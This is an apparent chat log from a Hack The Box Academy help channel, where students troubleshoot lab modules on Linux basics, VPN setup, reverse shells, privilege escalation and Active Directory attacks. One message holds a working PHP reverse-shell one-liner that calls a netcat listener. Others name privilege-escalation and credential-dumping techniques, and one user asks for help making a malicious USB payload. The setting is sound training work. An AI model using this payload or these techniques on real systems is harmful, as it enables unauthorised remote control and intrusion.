and even if you didnt know what you needed was an env variable, you should go through each of the unfamiliar new commands it introduced to see what they do 🙂

fathom pendant
#

^

#

man <command> go brr

rotund sphinx
thorn urchin
#

or even just run things go brr. whats the worst that can happen? I obliterate my system on accident and have to revert my VM? Oh no! anyways

rustic sage
fathom pendant
#

You definitely should

thin parrot
#

I did ||man env|| and couldn't understand the description

thorn urchin
#

env is a core utility, im not sure how youd even block it without breaking things

rustic sage
#

and thx for the answer of the question but what's the reason that answer is correct?

fathom pendant
#

the env command does allow you to run a command with custom variables

thorn urchin
fathom pendant
#

It's like alias

#

You can set something with alias. But if you run it on its own, you get a list of all aliased commands

rotund sphinx
fathom pendant
#

This is why snapshots are important for vms

#

And backups for live systems

fathom pendant
rustic sage
#

for the question + 0 Which shell is specified for the htb-student user? how I can do ?

fathom pendant
rotund sphinx
#

take another look at the output from env

fathom pendant
#

Look for the variable that would likely be it

#

You can also echo variables;
echo $VAR will print the value of that variable

rustic sage
fathom pendant
#

That's what it's set to

rustic sage
#

ok thx

neon wadi
#

If you're looking for "something" in the env output, it might be easier to sort it: env | sort or search it: env | grep -i something

thin parrot
#

To get Kernel version all you do is || uname -r || right?
What is the ||-123-generic referring to?||

rustic sage
#

4.15.0

rustic sage
#

env don't works

thin parrot
fathom pendant
rustic sage
#

yes

fathom pendant
#

Then env should work

thorn urchin
#

verify your account with #welcome and then you can send images. Share screenshot of env not working

rustic sage
#

ok ok that's works thx guys

#

sorry i don't write correctly the command

fathom pendant
#

Yeah writing commands incorrectly tends to be a problem

thorn urchin
#

I was troubleshooting a tier 3 module section yesterday for like a half hour because I accidentally wrote TEAMSRV in my cmds instead of TERMSRV

#

it happens lul

rustic sage
#

I don't have the good answer when I write License GPLv3+

#

I make mistakes??

fathom pendant
#

It happens

urban linden
#

I am trying to connect to target I spawned nin linux fundementals it says port 22 blocked

#

I am very new at networking and remote accessing

#

please help?

rotund sphinx
#

are you trying to connect from the pwnbox or from your own machine?

urban linden
#

my own machine

#

should I from my physical machine? or VM?

rotund sphinx
#

are you connected to the vpn? (with correct config for the region the target is in)

#

i would recomment using a VM but that shouldnt affect the ability to connect

urban linden
#

No, I am kinda lost on how to set up the VPN

cedar forum
#

hey, is this a valid code for the nibbles section in the getting started section? <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

urban linden
#

i downloaded the file

fathom pendant
#

I know one of the sections uses a public ip and port

urban linden
#

linux and windows fundementals I couldnt RDP or SSh

fathom pendant
#

Then it's likely you need to start the vpn

cedar forum
#

i dont think that matters much, its just that the php doesnt seem okay

#

atleast when i curl it it prints nothing

fathom pendant
#

sudo openvpn /path/to/academy-regular.ovpn

fathom pendant
cedar forum
#

ik

#

😦

fathom pendant
#

Also do you have the netcat listener running when you curl it?

#

It should hang if it's done properly

cedar forum
#

yes

fathom pendant
#

And your listener will have a connection

cedar forum
#

the curl ends and then nothing happens

#

is it okay if i have openvpn on the app?

#

and not on the machine?

fathom pendant
#

?

#

The vpn is only required if you're using your own vm

cedar forum
#

like this

fathom pendant
#

You should be running the vm in your Linux vm

cedar forum
#

okok

cedar forum
fathom pendant
#

Yes

#

If you're using the in-browser vm: then you don't need the vpn at all

cedar forum
#

thank you so much!

rotund sphinx
#

for rev shells you need the vpn and netcat listener to be running in the same place

#

having vpn on host and you working in vm will only work for you connecting to things

not having them connect back to you (which is what the rev shell tries to do)

fathom pendant
#

Yup

cedar forum
#

can i bg the vpn process?

#

using the & symbol

rotund sphinx
#

i think so

cedar forum
#

how would you do that? sudo openvpn /path/to/academy-regular.ovpn & like so?

rotund sphinx
#

tbh i just run it in a different tab

cedar forum
#

fair enough

fathom pendant
cedar forum
#

i wanted to make a .zshrc file with that

fathom pendant
#

In the event that you need to verify the connection works

rotund sphinx
#

particularly since i learnt about tmux i dont really use regular backgrounding anymore :p

cedar forum
fathom pendant
cedar forum
#

u cant scroll up if u divide the screen

fathom pendant
#

I dont use tmux

cedar forum
#

i wanst replying to you, sorry, it was a mistake xD

fathom pendant
#

I just use the basic gnome terminal

fathom pendant
#

I've just found tmux too clunky for me

#

¯_(ツ)_/¯

rotund sphinx
#

i never got mouse scrolling to work but you can do [ to enter copy mode and then up/down arrows to scroll

cedar forum
#

btw, do you guys also have a sort of lag when using the arrow keys in the terminal in your vm? not the browser one

rotund sphinx
#

it did take me a while to get used to but now i cant believe how long i went without it

cedar forum
#

i have this issue and i have no clue why, i feel like i allocated enough cores and RAM

next bronze
fathom pendant
#

I think ctrl-shift-t to create a new tab

#

Alt tab

#

I take advantage of the "workspaces" thing having my openvpn running in one workspace screen and use the other to do stuff, so I don't accidentally close it

next bronze
#

ah

next bronze
#

tmux is useful when you have many terminals open, I usually have 11 open at any given time and it's easy to switch and manage them

#

though the default keybinds suck

cedar forum
fathom pendant
#

I just never bothered to learn or cared to learn

#

Why break what works

cedar forum
fathom pendant
rotund sphinx
# cedar forum Windows 11

if you are using virtualbox you need to make sure hyper-v and a bunch of other windows services (eg memory core isolation) that use hyper-v behind the scenes are disabled

#

possibly (likely) that is true for vmware etc too or basically anything except hyper v itself

chrome lotus
#

Hey! I need some help on the "Introduction to Digital Forensics" module. I am on the Skills Assessment and I am only missing one answer. I am pretty sure it is correct, but the answer is still wrong

To clarify, it is this question: Determine the registry key used for persistence and enter it as your answer.

Edit: Nevermind, I was being super dumb (although my initial answer seems to be okay too 🤔 )

#

I'm mostly requesting someone who has done the module for a check in DMs

urban linden
#

How do I set up VPN on workspaces?

fathom pendant
#

Download the vpn in the vm

#

And what do you mean by workspaces

rotund sphinx
#

download the .ovpn file from HTB into your VM, then run sudo openvpn {path to the file}

cedar forum
#

btw, is the reverse shell supposed to be super slow?

fathom pendant
cedar forum
#

other times it just hangs

fathom pendant
#

you might need to change vpn regions or (if you're not already) use the tcp vpn

cedar forum
#

how do i do that?

fathom pendant
#

on the page; there should be a section for the vpn that'll have a dropdown menu for the vpn

#

and 2 buttons, one for udp and one for tcp

cedar forum
#

i just did that

#

wait

#

this just made it 1000x better

calm tapir
cobalt trench
#

Footprinting IMAP/POP3 can I get a nudge in the right direction please

#

Connecting to the server gave me a email address but its not the right one. I found an article on imap commands but none of them are giving me what I need

marsh echo
marsh echo
cobalt trench
severe arrow
#

Heyo having some issues with the Broke Auth - Predictable Reset Token module, specifically question 1.

marsh echo
#

you are select a inbox ?

marsh echo
cobalt trench
#

Found that too but still confused. I think Im starting to put the pieces together though

severe arrow
marsh echo
#

process : poster they inbox, select a mailbox with content, display first the mail object then the content, but there's a command that lets you do both. I'll leave you to look for it.

severe arrow
severe arrow
# severe arrow Here is a screen shot of my code running! JK I can not get a photo but here is a...

Here is some additional information

Script Output

Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Tranlated: 1706175824000
System Time: 1706150624000

Sample Code of the Time Conversion
data = {"submit": "htbuser"}
date = requests.post(url, data)

dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")

print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
print("Time Stamp Request Tranlated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()

ruby whale
honest notch
#

Hi bro, I had the same problem, did you solve it?

marsh echo
rustic sage
#

what is imap

#

Internet message access protocol??

steel grail
severe arrow
idle nebula
#

yo vnk

ruby whale
#

Yup @idle nebula ?

idle nebula
#

is there a way to use the attackbox for free using a pn

#

vpn

ruby whale
#

pwnbox ? I think you get 1 free spawn/day

idle nebula
#

oh sweet preciate it

#

sorry i cant really help u with exploiting this room manually

#

i still dont the basic fuindamental commands

#

like how to use nmap or gobuster

ruby whale
#

Its fine that was for other members

idle nebula
#

i just know ls adn cd and yeah

#

and

#

is hackthebox for intermidiate hackers?

ruby whale
#

When I started I was not intermediate

idle nebula
#

I see

idle nebula
#

wish i could help u out man

steel grail
#

Anyone know how to escalate privilege to root after I gain a foothold on a server ?

#

I was told to use the shell command but I’m stuck now

fathom pendant
fathom pendant
#

you can either transfer over linPeas

#

OR run sudo -l

#

:)

steel grail
#

It says sudo -1 is an invalid option

fathom pendant
#

that's an L

marsh echo
fathom pendant
#

not a 1

steel grail
#

Oh

#

It works now

steel grail
fathom pendant
steel grail
#

I ran it… just went blank

fathom pendant
#

it's really that simple, a couple lines

#

if you don't close the quotes then it's likely waiting for you to close the quotes

steel grail
#

i get an "(" erorr

#

/bin/sh: 1: Syntax error: "(" unexpected

fathom pendant
#

screenshot your terminal

#

bc you're likely misreading or misunderstanding something

steel grail
#

Wait

velvet flax
#

Vim or Nano ?

steel grail
#

1 sec and then I will

fathom pendant
velvet flax
fathom pendant
#

¯_(ツ)_/¯

#

i mean it's as shrimple as that

#

people like to use nano, and people like to use vim; and this isn't really the place to have that discussion/argument

velvet flax
#

So @fathom pendant you in the industry ?

fathom pendant
#

nope

velvet flax
#

Just a hobby for you?

fathom pendant
#

yep

velvet flax
#

What side of IT do you prefer ?

#

Hacking only ?

fathom pendant
quick magnet
#

hi, have u solve this, facing same issue, already renew like bunny said but still not work

fathom pendant
#

what does your CMD= line look like

ruby whale
steel grail
#

tried it a few ways

steel grail
#

should I be running this script from a file on my computer other than my console?

quick magnet
#

hi, how u solve this ?
what step the module doesn't show

fathom pendant
#

and I just did it and it works fine on mine

#

ah ik what happened

#

you copied from the medium post which has the weird quotes

#

so it copied it weirdly

#

"/bin/sh"

#

look at how the quotes curve instead of being straight on the first one after your cmd=

final maple
final maple
steel grail
#

i can do it in the shell though

final maple
# quick magnet Dc01 right ?

The module doesn't show you which domain admin to target, so I had to first use PowerView to find the Domain Admin

fathom pendant
#

try typing out CMD="/bin/sh" instead of copy/pasting

fathom pendant
#

now run the php command again

#

and then do whoami

steel grail
#

Ayoooo

#

I was thinking something would output

#

No wonder I was stuck

fathom pendant
#

nah this shell is dumb

steel grail
#

Whoooop thanks Marcie

fathom pendant
#

whenever you run a command that's meant to escalate your privs, always check whoami

final maple
fathom pendant
rapid sparrow
#
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

Stucked so long from the Introduction To Splunk & SPL

#

what I have used

#

||EventCode=4624 | stats range(_time, 0, 10m)||

tranquil axle
midnight galleon
#

linux PrivEsc module - Environment Enumeration
flag not working?

#

made sure no spaces before or after

next bronze
#

you probably found a flag for the later questions, what's the first and last letter

next bronze
#

yeah wrong flag

midnight galleon
#

next question asks for python version and the one after it spawns new target

#

and ask for cred

next bronze
#

lol the flag you found is way further down the module

#

the flag you want should be pretty simple

midnight galleon
#

||i used sudo baron samedit to become root||FeelsGoodMan

next bronze
#

I know, but that's got nothing to do with that section lol

midnight galleon
#

the section is all about escalation, idk why it wants info gathering

fathom pendant
#

because part of escalation is gathering info

midnight galleon
fathom pendant
#

and that's why you're overlooking the simple things :)

next bronze
#

meh linpeas gives too much information and most of it is useless

midnight galleon
fathom pendant
#

autopwn

#

which is something you can enable in linpeas iirc

#

it's disabled so people can run it on OSCP boxes kek

midnight galleon
fathom pendant
#

ye linPeas has an autopwn function if i'm remembering right

#

unless they removed it completely

placid edge
#

raaa the windows privesc takes 10 working days to get whoami printed out

#

this module is good, but so slow its insane

wild oriole
#

Guys, are the CBBH materials enough to pass the exam?
Or I need to practice on PortSwigger for example

midnight galleon
#

i searched everywhere with root

next bronze
#

just run the commands in that section

#

who asked you to get root?

acoustic owl
wild oriole
#

I am just wondering about constructing a complicated payloads, AFAIK, in PortSwigger for example
the XSS payloads could be too complicated, and in CBBH it's too naive like simple closing tag with script tag, so do we have such complicated payloads in the exam? or just like the path and it's focus on the methodology?

midnight galleon
next bronze
#

oh wait it's this one

#

yeah search for a pattern that matches the flag format in every file

midnight galleon
#

regexNotLikeThis

next bronze
#

something .* something

#

use a wildcard

ruby whale
#

Done for today I was stuck in sqlmap module for sometime then figured out that these targets have time limit of 90 mins. sadglas

snow zodiac
#

hi can someone help me create infectious file in setoolkit for a usb drive i tried it but when i launched metasploit and ran it , it gave me error.

fathom pendant
quick crane
heavy marsh
#

Attacking Domain Trust from Linux section is not working for the first command

fathom pendant
#

<@&861185840277487616>

heavy marsh
#

Okay, so I got the password for the lab right, now the command won't work for the user bross for the question in the end of the lab

severe arrow
heavy marsh
#

Also tried this

next bronze
heavy marsh
#

This is the question that I am having issues with

#

None of the commands are working for that username

next bronze
#

why not just dump everything

heavy marsh
#

I don't understand what they mean by the extrasids attack, that was from the windows section?!?!

heavy marsh
next bronze
next bronze
alpine hound
#

hey all having trouble with the footprinting medium box i have the password, or what i assume is the password from the database but im having trouble getting HTB to accept the answer you just put the password correct? you dont need the user at all for it to accept the answer

alpine hound
heavy marsh
#

I got the shell

heavy marsh
next bronze
#

if you have already done the attack then just get bross's hash

#

the user is in the parent domain, not the child domain

heavy marsh
livid ether
#

sorry guys for asking but im noob af, anyone knows why if i copy the root id_rsa private key on my machine to login ssh with it its denied?

fathom pendant
livid ether
#

600

severe arrow
heavy marsh
#

I'm in LOGISTICS.INLANEFREIGHT.LOCAL, is that one of the ones you're talking about?

fathom pendant
#

those are also part of the SSH key

livid ether
#

it has, prolly its some rror to paste?

fathom pendant
livid ether
#

okay tyy

next bronze
fathom pendant
#

what module and section are you working on?

livid ether
#

the gettign started one

#

i just started today

fathom pendant
#

then it's likely copy/pasted wrong

severe arrow
next bronze
#

yes, if you're using datetime it will convert to your current timezone

fathom pendant
livid ether
#

okay tyy

fathom pendant
#

note remove the brackets

fathom pendant
severe arrow
#

I’ll try utc conversion when I’m off shift thanks

livid ether
next bronze
fathom pendant
livid ether
#

oh, prolly the port, in the web its not shown so i ddnt use it

fathom pendant
heavy marsh
#

There is no C:\Tools folder once I do the psexec.py command to get a shell

#

How am I supposed to execute the ExtraSids attack?

fathom pendant
livid ether
heavy marsh
#

All I get is the flag in the ExtraSids folder, I actually just need the hash for bross

fathom pendant
livid ether
#

yup

severe arrow
fathom pendant
livid ether
#

yup, /root/.ssh/id_rsa

fathom pendant
#

ah yeah this one is a public ip

#

you need to specify port

heavy marsh
#

I don't even see bross

livid ether
#

okay thaanks for ur time ;D

fathom pendant
heavy marsh
#

What are they asking for?!?!

livid ether
#

lemme see

fathom pendant
next bronze
livid ether
#

ye i did

fathom pendant
fathom pendant
next bronze
#

okay then

livid ether
#

oh

#

gtk

fathom pendant
#

it doesn't magically know what port is running ssh

livid ether
#

ahhaha touche

next bronze
raven gorge
#

Anyone around to give me a hint on the File Upload module assesment?
So far I managed to read the source code of the app and locate the upload directory with some fuzzing, but I'm unable to upload a file that I can execute. Tried double extension with null bytes and tampering the image extension through the file name length so far

fathom pendant
livid ether
#

okay

next bronze
heavy marsh
fathom pendant
# livid ether okay

http - 80, https - 443, RDP - 3389, ssh 22: just a handful of default ports

#

the footprinting module goes over more of them

heavy marsh
#

But it only gives me the administrator and krbtgt

severe arrow
# next bronze are you converting the timestamp returned by the target, and how are you convert...

Please view whole thread code is in there. Grabbed it Here is some additional information

Script Output

Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Tranlated: 1706175824000
System Time: 1706150624000

Sample Code of the Time Conversion
data = {"submit": "htbuser"}
date = requests.post(url, data)

dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")

print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
print("Time Stamp Request Tranlated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()

next bronze
heavy marsh
#

I don't have mimikatz

#

I'm in linux and the shell I get doesn't have the tools folder

next bronze
#

dude.

livid ether
#

okay now its done thank u Marciee ;D

next bronze
#

dcsync .5